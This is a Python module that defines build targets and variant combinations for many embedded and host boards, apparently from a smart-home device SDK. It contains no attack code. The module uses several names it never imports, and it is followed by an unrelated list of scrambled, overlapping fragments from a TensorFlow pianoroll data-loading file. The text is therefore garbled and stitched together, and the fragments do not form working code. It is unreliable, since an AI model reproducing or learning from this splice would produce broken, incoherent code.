from builders.host import HostApp, HostBoard, HostBuilder
from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder
from builders.k32w import K32WApp, K32WBuilder
from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile
from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder
from builders.qpg import QpgApp, QpgBoard, QpgBuilder
from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder
from builders.tizen import TizenApp, TizenBoard, TizenBuilder
from builders.bl602 import Bl602App, Bl602Board, Bl602Builder
from builders.imx import IMXApp, IMXBuilder


class Target:
    """Represents a build target:

    Has a name identifier plus parameters on how to build it (what
    builder class to use and what arguments are required to produce
    the specified build)
    """

    def __init__(self, name, builder_class, **kwargs):
        self.name = name
        self.builder_class = builder_class
        self.glob_blacklist_reason = None
        self.create_kw_args = kwargs

    def Clone(self):
        """Creates a clone of self."""
        clone = Target(self.name, self.builder_class,
                       **self.create_kw_args.copy())
        clone.glob_blacklist_reason = self.glob_blacklist_reason
        return clone

    def Extend(self, suffix, **kargs):
        """Creates a clone of the current object extending its build parameters.

        Arguments:
           suffix: appended with a "-" as separator to the clone name
           **kargs: arguments needed to produce the new build variant
        """
        clone = self.Clone()
        clone.name += "-" + suffix
        clone.create_kw_args.update(kargs)
        return clone

    def Create(self, runner, repository_path: str, output_prefix: str,
               enable_flashbundle: bool):
        builder = self.builder_class(
            repository_path, runner=runner, **self.create_kw_args)

        builder.target = self
        builder.identifier = self.name
        builder.output_dir = os.path.join(output_prefix, self.name)
        builder.enable_flashbundle(enable_flashbundle)

        return builder

    def GlobBlacklist(self, reason):
        clone = self.Clone()
        if clone.glob_blacklist_reason:
            clone.glob_blacklist_reason += ", "
            clone.glob_blacklist_reason += reason
        else:
            clone.glob_blacklist_reason = reason
        return clone

    @property
    def IsGlobBlacklisted(self):
        return self.glob_blacklist_reason is not None

    @property
    def GlobBlacklistReason(self):
        return self.glob_blacklist_reason


class AcceptAnyName:
    def Accept(self, name: str):
        return True


class AcceptNameWithSubstrings:
    def __init__(self, substr: List[str]):
        self.substr = substr

    def Accept(self, name: str):
        for s in self.substr:
            if s in name:
                return True
        return False


class BuildVariant:
    def __init__(self, name: str, validator=AcceptAnyName(),
                 conflicts: List[str] = [], requires: List[str] = [],
                 **buildargs):
        self.name = name
        self.validator = validator
        self.conflicts = conflicts
        self.buildargs = buildargs
        self.requires = requires


def HasConflicts(items: List[BuildVariant]) -> bool:
    for a, b in combinations(items, 2):
        if (a.name in b.conflicts) or (b.name in a.conflicts):
            return True
    return False


def AllRequirementsMet(items: List[BuildVariant]) -> bool:
    """Check that item.requires is satisfied for all items in the given list."""
    available = set([item.name for item in items])

    for item in items:
        for requirement in item.requires:
            if requirement not in available:
                return False

    return True


class VariantBuilder:
    """Handles creating multiple build variants based on a starting target."""

    def __init__(self, targets: List[Target] = []):
        # note the clone in case the default arg is used
        self.targets = targets[:]
        self.variants = []
        self.glob_whitelist = []

    def WhitelistVariantNameForGlob(self, name):
        """Whitelist the specified variant to be allowed for globbing.

        By default we do not want a 'build all' to select all variants, so
        variants are generally glob-blacklisted.
        """
        self.glob_whitelist.append(name)

    def AppendVariant(self, **args):
        """Add another variant to accepted variants.

        Arguments are construction variants to BuildVariant.

        Example usage:
           builder.AppendVariant(name="ipv6only", enable_ipv4=False)
        """
        self.variants.append(BuildVariant(**args))

    def AllVariants(self):
        """Yields a list of acceptable variants for the given targets.

        Handles conflict resolution between build variants and globbing
        whitelist targets.
        """
        for target in self.targets:
            yield target

            # skip variants that do not work for this target
            ok_variants = [
                v for v in self.variants if v.validator.Accept(target.name)]

            # Build every possible variant
            for variant_count in range(1, len(ok_variants) + 1):
                for subgroup in combinations(ok_variants, variant_count):
                    if HasConflicts(subgroup):
                        continue

                    if not AllRequirementsMet(subgroup):
                        continue

                    # Target ready to be created - no conflicts
                    variant_target = target.Clone()
                    for option in subgroup:
                        variant_target = variant_target.Extend(
                            option.name, **option.buildargs)

                    # Only a few are whitelisted for globs
                    name = '-'.join([o.name for o in subgroup])
                    if name not in self.glob_whitelist:
                        if not variant_target.IsGlobBlacklisted:
                            variant_target = variant_target.GlobBlacklist(
                                'Reduce default build variants')

                    yield variant_target


def HostTargets():
    target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
    target_native = target.Extend(
        HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE)

    targets = [target_native]

    # x64 linux supports cross compile
    cross_compile = (HostBoard.NATIVE.PlatformName() == 'linux') and (
        HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName())
    if cross_compile:
        targets.append(target.Extend('arm64', board=HostBoard.ARM64))

    app_targets = []

    # Don't cross compile some builds
    app_targets.append(
        target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE))
    app_targets.append(
        target_native.Extend('tv-app', app=HostApp.TV_APP))
    app_targets.append(
        target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP))
    app_targets.append(
        target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER))

    for target in targets:
        app_targets.append(target.Extend(
            'all-clusters', app=HostApp.ALL_CLUSTERS))
        if (HostBoard.NATIVE.PlatformName() == 'darwin'):
            app_targets.append(target.Extend(
                'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN))
        app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL))
        app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT))
        app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS))
        app_targets.append(target.Extend('light', app=HostApp.LIGHT))
        app_targets.append(target.Extend('lock', app=HostApp.LOCK))
        app_targets.append(target.Extend('shell', app=HostApp.SHELL))
        app_targets.append(target.Extend(
            'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False))
        app_targets.append(target.Extend(
            'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False))
        app_targets.append(target.Extend(
            'python-bindings', app=HostApp.PYTHON_BINDINGS))

    builder = VariantBuilder()

    # Possible build variants. Note that number of potential
    # builds is exponential here
    builder.AppendVariant(name="same-event-loop", validator=AcceptNameWithSubstrings(
        ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False)
    builder.AppendVariant(name="no-interactive", validator=AcceptNameWithSubstrings(
        ['-chip-tool']), interactive_mode=False)
    builder.AppendVariant(name="ipv6only", enable_ipv4=False)
    builder.AppendVariant(name="no-ble", enable_ble=False)
    builder.AppendVariant(name="no-wifi", enable_wifi=False)
    builder.AppendVariant(name="tsan", conflicts=['asan'], use_tsan=True)
    builder.AppendVariant(name="asan", conflicts=['tsan'], use_asan=True)
    builder.AppendVariant(name="libfuzzer", requires=[
                          "clang"], use_libfuzzer=True)
    builder.AppendVariant(name="clang", use_clang=True)
    builder.AppendVariant(name="test", extra_tests=True)

    builder.WhitelistVariantNameForGlob('no-interactive-ipv6only')
    builder.WhitelistVariantNameForGlob('ipv6only')

    for target in app_targets:
        if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in target.name):
            # Single-variant builds
            yield target
        else:
            builder.targets.append(target)

    for target in builder.AllVariants():
        if cross_compile and 'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive' not in target.name:
            # Interactive builds will not compile by default on arm cross
            # compile, because libreadline is not part of the default sysroot
            yield target.GlobBlacklist(
                'Arm crosscompile does not support libreadline-dev')
        else:
            yield target

    # Without extra build variants
    yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL)
    yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE)
    yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE,
                               use_clang=True).GlobBlacklist("Reduce default build variants")
    yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE,
                               use_platform_mdns=True).GlobBlacklist("Reduce default build variants")
    yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE,
                               use_platform_mdns=True, enable_ipv4=False).GlobBlacklist("Reduce default build variants")

    test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder)
    for board in [HostBoard.NATIVE, HostBoard.FAKE]:
        yield test_target.Extend(board.BoardName() + '-tests', board=board,
                                 app=HostApp.TESTS)


def Esp32Targets():
    esp32_target = Target('esp32', Esp32Builder)

    yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS)
    yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS, enable_ipv4=False)
    yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS, enable_rpcs=True)
    yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack,
                              app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False)

    yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit,
                              app=Esp32App.ALL_CLUSTERS)

    devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC)

    yield devkitc.Extend('all-clusters', app=Esp32App.ALL_CLUSTERS)
    yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS,
                         enable_ipv4=False)
    yield devkitc.Extend('shell', app=Esp32App.SHELL)
    yield devkitc.Extend('light', app=Esp32App.LIGHT)
    yield devkitc.Extend('lock', app=Esp32App.LOCK)
    yield devkitc.Extend('bridge', app=Esp32App.BRIDGE)
    yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT)
    yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT,
                         enable_rpcs=True)

    yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS)


def Efr32Targets():
    efr_target = Target('efr32', Efr32Builder)

    board_targets = [
        efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A),
        efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4186a', board=Efr32Board.BRD4186A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist(
            'only user requested'),
        efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist(
            'only user requested')
    ]

    builder = VariantBuilder()

    for board_target in board_targets:
        builder.targets.append(board_target.Extend(
            'window-covering', app=Efr32App.WINDOW_COVERING))
        builder.targets.append(board_target.Extend(
            'switch', app=Efr32App.SWITCH))
        builder.targets.append(board_target.Extend(
            'unit-test', app=Efr32App.UNIT_TEST))
        builder.targets.append(
            board_target.Extend('light', app=Efr32App.LIGHT))
        builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK))

    # Possible build variants. Note that number of potential
    # builds is exponential here
    builder.AppendVariant(name="rpc", validator=AcceptNameWithSubstrings(
        ['-light', '-lock']), enable_rpcs=True)
    builder.AppendVariant(name="with-ota-requestor", enable_ota_requestor=True)

    builder.WhitelistVariantNameForGlob('rpc')

    for target in builder.AllVariants():
        yield target


def NrfTargets():
    target = Target('nrf', NrfConnectBuilder)

    yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64,
                        app=NrfApp.UNIT_TESTS)

    targets = [
        target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK),
        target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK),
    ]

    # Enable nrf52840dongle for all-clusters and lighting app only
    yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE,
                        app=NrfApp.ALL_CLUSTERS)
    yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE,
                        app=NrfApp.LIGHT)

    for target in targets:
        yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS)
        yield target.Extend('lock', app=NrfApp.LOCK)
        yield target.Extend('light', app=NrfApp.LIGHT)
        yield target.Extend('shell', app=NrfApp.SHELL)
        yield target.Extend('pump', app=NrfApp.PUMP)
        yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER)

        rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True)

        if '-nrf5340dk-' in rpc.name:
            rpc = rpc.GlobBlacklist(
                'Compile failure due to pw_build args not forwarded to proto compiler. '
                'https://pigweed-review.googlesource.com/c/pigweed/pigweed/+/66760')

        yield rpc


def AndroidTargets():
    target = Target('android', AndroidBuilder)

    yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST)
    yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM,
                        app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64,
                        app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86,
                        app=AndroidApp.CHIP_TOOL)
    yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64,
                        app=AndroidApp.CHIP_TOOL)
    yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('x86-chip-tvserver', board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer)
    yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64,
                        app=AndroidApp.CHIP_TV_CASTING_APP)
    yield target.Extend('arm-chip-tv-casting-app', board=AndroidBoard.ARM,
                        app=AndroidApp.CHIP_TV_CASTING_APP)


def MbedTargets():
    target = Target('mbed', MbedBuilder)

    targets = [
        target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W),
    ]

    app_targets = []
    for target in targets:
        app_targets.append(target.Extend('lock', app=MbedApp.LOCK))
        app_targets.append(target.Extend('light', app=MbedApp.LIGHT))
        app_targets.append(target.Extend(
            'all-clusters', app=MbedApp.ALL_CLUSTERS))
        app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED))
        app_targets.append(target.Extend('shell', app=MbedApp.SHELL))

    for target in app_targets:
        yield target.Extend('release', profile=MbedProfile.RELEASE)
        yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist(
            'Compile only for debugging purpose - '
            'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')
        yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist(
            'Compile only for debugging purpose - '
            'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')


def InfineonTargets():
    target = Target('infineon', InfineonBuilder)

    yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK)
    yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS)
    yield target.Extend('p6-light', board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT)


def AmebaTargets():
    ameba_target = Target('ameba', AmebaBuilder)

    yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD,
                              app=AmebaApp.ALL_CLUSTERS)
    yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT)
    yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED)


def K32WTargets():
    target = Target('k32w', K32WBuilder)

    yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True,
                        disable_ble=True, se05x=True).GlobBlacklist("Only on demand build")
    yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True,
                        disable_ota=True, release=True)
    yield target.Extend('shell-release', app=K32WApp.SHELL, release=True)
    yield target.Extend('lock-release', app=K32WApp.LOCK, release=True)
    yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True,
                        release=True).GlobBlacklist("Only on demand build")


def cc13x2x7_26x2x7Targets():
    target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder)

    yield target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True)
    yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False)
    yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP)
    yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER)
    yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS)
    yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL)


def Cyw30739Targets():
    yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT)
    yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LOCK)
    yield Target('cyw30739-cyw930739m2evb_01-ota-requestor', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01,
                 app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist(
        "Running out of XIP flash space")
    yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder,
                 board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR,
                 progress_logging=False)


def QorvoTargets():
    target = Target('qpg', QpgBuilder)

    yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK)
    yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT)
    yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL)
    yield target.Extend('persistent-storage', board=QpgBoard.QPG6105,
                        app=QpgApp.PERSISTENT_STORAGE)


def TizenTargets():
    # Possible build variants.
    # NOTE: The number of potential builds is exponential here.
    builder = VariantBuilder()
    builder.AppendVariant(name="no-ble", enable_ble=False)
    builder.AppendVariant(name="no-wifi", enable_wifi=False)
    builder.AppendVariant(name="asan", use_asan=True)

    target = Target('tizen-arm', TizenBuilder, board=TizenBoard.ARM)
    builder.targets.append(target.Extend('light', app=TizenApp.LIGHT))

    for target in builder.AllVariants():
        yield target


def Bl602Targets():
    target = Target('bl602', Bl602Builder)

    yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT)


def IMXTargets():
    target = Target('imx', IMXBuilder)

    yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL)
    yield target.Extend('lighting-app', app=IMXApp.LIGHT)
    yield target.Extend('thermostat', app=IMXApp.THERMOSTAT)
    yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS)
    yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER)
    yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True)
    yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True)
    yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True)
    yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True)
    yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True)


ALL = []

target_generators = [
    HostTargets(),
    Esp32Targets(),
    Efr32Targets(),
    NrfTargets(),
    AndroidTargets(),
    MbedTargets(),
    InfineonTargets(),
    AmebaTargets(),
    K32WTargets(),
    cc13x2x7_26x2x7Targets(),
    Cyw30739Targets(),
    QorvoTargets(),
    TizenTargets(),
    Bl602Targets(),
    IMXTargets(),
]

for generator in target_generators:
    for target in generator:
        ALL.append(target)

# Simple targets added one by one
ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder,
                  board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT))
ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder,
                  board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH))

# have a consistent order overall
ALL.sort(key=lambda t: t.name)
[ "the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label): \"\"\"Set the label", "= dataset.map( lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset", "and `lables` do not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data,", "assert len(data) == len(labels), ( \"Lengths of `data` and `lables`", "\"\"\"Data Generator.\"\"\" if labels is None: for item in data:", "------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some random samples", "== 'sa': import SharedArray as sa return sa.attach(data_filename) if data_source", "def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and return the", "a tensorflow dataset from an array.\"\"\" if labels is None:", "import tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER", "file.\"\"\" return np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the training", "enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item * 2. - 1.,", "is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if use_random_transpose:", "data[[x for x in f['nonzero']]] = True return data def", "shape and return the label.\"\"\" label.set_shape([1]) return label # ---", "\"\"\"Load and return the training data.\"\"\" if data_source == 'sa':", "item in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item * 2.", "'npz': return load_data_from_npz(data_filename) raise ValueError(\"Expect `data_source` to be one of", "0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:] pianoroll[:, semitone:,", "yield item * 2. - 1. else: yield item else:", "if np.issubdtype(data.dtype, np.bool_): yield (item * 2. - 1., labels[i])", "yield item else: for i, item in enumerate(data): if np.issubdtype(data.dtype,", "dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose:", "SharedArray as sa return sa.attach(data_filename) if data_source == 'npy': return", "tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape(", "the training data from a npz file (sparse format).\"\"\" with", "in enumerate(data): if np.issubdtype(data.dtype, np.bool_): yield (item * 2. -", "the training data.\"\"\" indices = np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype,", "--- Sampler ------------------------------------------------------------------ def get_samples(n_samples, data, labels=None, use_random_transpose=False): \"\"\"Return some", "`lables` do not match.\") dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data, labels),", "lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset = dataset.map(", "the label shape and return the label.\"\"\" label.set_shape([1]) return label", "+ str(data_source)) # --- Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly", "with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone", "data[indices] * 2. - 1. 
else: sample_data = data[indices] if", "= dataset.map( lambda pianoroll, label: ( tf.py_func(random_transpose, [pianoroll], tf.float32), label),", "format).\"\"\" with np.load(filename) as f: data = np.zeros(f['shape'], np.bool_) data[[x", "= data[indices] if use_random_transpose: sample_data = np.array([random_transpose(x) for x in", "data: if np.issubdtype(data.dtype, np.bool_): yield item * 2. - 1.", "sample_data]) if labels is None: return sample_data return sample_data, labels[indices]", "an array.\"\"\" if labels is None: dataset = tf.data.Dataset.from_generator( lambda:", "np.random.choice(len(data), n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] *", "np.load(filename) as f: data = np.zeros(f['shape'], np.bool_) data[[x for x", "= dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data)", "is None: for item in data: if np.issubdtype(data.dtype, np.bool_): yield", "label shape and return the label.\"\"\" label.set_shape([1]) return label #", "tensorflow.compat.v1 as tf from musegan.config import SHUFFLE_BUFFER_SIZE, PREFETCH_SIZE LOGGER =", "------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with [-5, 6]", "------------------------------------------------------- def _gen_data(data, labels=None): \"\"\"Data Generator.\"\"\" if labels is None:", "2. - 1. else: sample_data = data[indices] if use_random_transpose: sample_data", "pianoroll, data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels), ( \"Lengths", "item in data: if np.issubdtype(data.dtype, np.bool_): yield item * 2.", "if labels is None: return sample_data return sample_data, labels[indices] #", "data_shape=None, use_random_transpose=False, num_threads=1): \"\"\"Create and return a tensorflow dataset from", "data. \"\"\" import logging import numpy as np import tensorflow.compat.v1", "labels is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32) if", "-semitone:, 1:] pianoroll[:, semitone:, 1:] = 0 return pianoroll def", "[pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape),", "semitone < 0: pianoroll[:, :semitone, 1:] = pianoroll[:, -semitone:, 1:]", "data_shape), num_parallel_calls=num_threads) else: assert len(data) == len(labels), ( \"Lengths of", "0 elif semitone < 0: pianoroll[:, :semitone, 1:] = pianoroll[:,", "if labels is None: dataset = tf.data.Dataset.from_generator( lambda: _gen_data(data), tf.float32)", "= 0 return pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll", "return sa.attach(data_filename) if data_source == 'npy': return load_data_from_npy(data_filename) if data_source", "set_label_shape(label): \"\"\"Set the label shape and return the label.\"\"\" label.set_shape([1])", "6] semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone > 0:", "a pianoroll with [-5, 6] semitones.\"\"\" semitone = np.random.randint(-5, 6)", "loading and preprocessing pianoroll data. 
\"\"\" import logging import numpy", "and return the label.\"\"\" label.set_shape([1]) return label # --- Sampler", "semitones.\"\"\" semitone = np.random.randint(-5, 6) if semitone > 0: pianoroll[:,", "tf.data.Dataset.from_generator( lambda: _gen_data(data, labels), [tf.float32, tf.int32]) if use_random_transpose: dataset =", "and return the training data.\"\"\" if data_source == 'sa': import", "Dataset Utilities ------------------------------------------------------- def random_transpose(pianoroll): \"\"\"Randomly transpose a pianoroll with", "= True return data def load_data(data_source, data_filename): \"\"\"Load and return", "if labels is None: for item in data: if np.issubdtype(data.dtype,", "\"\"\"Load and return the training data from a npz file", "data_source == 'npy': return load_data_from_npy(data_filename) if data_source == 'npz': return", "1:] = 0 elif semitone < 0: pianoroll[:, :semitone, 1:]", "np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2. - 1. else:", "else: yield (item, labels[i]) def get_dataset(data, labels=None, batch_size=None, data_shape=None, use_random_transpose=False,", "f['nonzero']]] = True return data def load_data(data_source, data_filename): \"\"\"Load and", "num_parallel_calls=num_threads) dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else:", "shape and return the pianoroll.\"\"\" pianoroll.set_shape(data_shape) return pianoroll def set_label_shape(label):", "`data_source` to be one of 'sa', 'npy', 'npz'. \" \"But", "preprocessing pianoroll data. \"\"\" import logging import numpy as np", "\"\"\"Create and return a tensorflow dataset from an array.\"\"\" if", "is None: return sample_data return sample_data, labels[indices] # --- Tensorflow", "n_samples, False) if np.issubdtype(data.dtype, np.bool_): sample_data = data[indices] * 2.", "def load_data_from_npy(filename): \"\"\"Load and return the training data from a", "in sample_data]) if labels is None: return sample_data return sample_data,", "pianoroll def set_pianoroll_shape(pianoroll, data_shape): \"\"\"Set the pianoroll shape and return", "lambda pianoroll: tf.py_func( random_transpose, [pianoroll], tf.float32), num_parallel_calls=num_threads) dataset = dataset.map(lambda", "for item in data: if np.issubdtype(data.dtype, np.bool_): yield item *", "np.load(filename) def load_data_from_npz(filename): \"\"\"Load and return the training data from", "dataset = dataset.map(lambda pianoroll: set_pianoroll_shape( pianoroll, data_shape), num_parallel_calls=num_threads) else: assert", "'npy', 'npz'. \" \"But get \" + str(data_source)) # ---", "( \"Lengths of `data` and `lables` do not match.\") dataset", "'npz'. 
